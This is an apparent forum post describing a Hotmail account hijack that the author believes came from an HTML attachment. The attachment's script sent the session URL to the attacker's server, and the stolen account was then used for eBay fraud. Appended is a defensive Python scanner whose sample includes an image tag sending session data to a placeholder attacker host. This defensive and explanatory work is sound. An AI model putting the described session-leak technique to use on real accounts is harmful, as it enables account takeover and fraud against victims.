Some guy hijacked my hotmail account.. He then used it to reset my password at eBay (which was then sent to my hotmail account) then started listing a bunch of items (telling people to send him payment at Romania)..
I'm lucky that one of the bidders actually called me on the phone and let me know.. I was able to minimize the damage but two did get through..
Here's my theory of operation on how he hijacked my Hotmail account..
1) He sent me an e-mail with an "html" attachment (yes, HTML) (I viewed it using Outlook Express - latest version with all updates)
2) The person then sends me another e-mail, asking if I opened the attachment.
3) Note that when one clicks on an attachment using Outlook Express (from hotmail), it opens up a browser window to hotmail so that one can view the attachment.
4) His god darned HTML attachment is not without a malicious payload - It has JavaScript that runs (while I'm on hotmail) due to <IMG> tags
5) He used the URL within the javascript as an HTTP request parameter directed to one of his servers.
The rest, you already know..
I will be filing a security report with Hotmail tomorrow, along with Microsoft, to detail my findings..
Such a simple method too. I guess we need to be careful even when opening up HTML attachments.
George
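As an added example (not code from the original post), a small scanner for the kind of HTML attachment described above: it parses the attachment and flags constructs that can run script or fire a request to another host when rendered inside a logged-in webmail session. The trusted host name and the sample attachment are constructed assumptions.

```python
# Added example: flag script-capable and externally-loading constructs in an
# HTML attachment before it is rendered in an authenticated webmail session.
from html.parser import HTMLParser
from urllib.parse import urlsplit


class AttachmentScanner(HTMLParser):
    """Collects findings; trusted_host is the webmail host allowed to serve images."""

    def __init__(self, trusted_host):
        super().__init__()
        self.trusted_host = trusted_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs.items():
            if name.startswith("on"):          # inline event handler (onload, onerror, ...)
                self.findings.append(f"event handler {name} on <{tag}>")
            if value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")
        if tag in ("img", "iframe", "frame") and attrs.get("src"):
            # An element that loads from another host can carry request
            # parameters (such as the current page URL) to that host.
            host = urlsplit(attrs["src"]).hostname
            if host and host.lower() != self.trusted_host:
                self.findings.append(f"<{tag}> loads from external host {host}")


def scan_html_attachment(html, trusted_host="hotmail.com"):
    """Return the list of suspicious constructs found in an HTML attachment."""
    scanner = AttachmentScanner(trusted_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample resembling the post: a script element plus an <img> whose
# request goes to a server outside the webmail host (placeholder host name).
SAMPLE = """<html><body><p>Invoice attached.</p>
<script>/* constructed placeholder, no payload */</script>
<img src="http://EXAMPLE-ATTACKER-HOST/i.gif?u=SESSION-URL-WOULD-GO-HERE">
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE):
        print("FLAG:", finding)
```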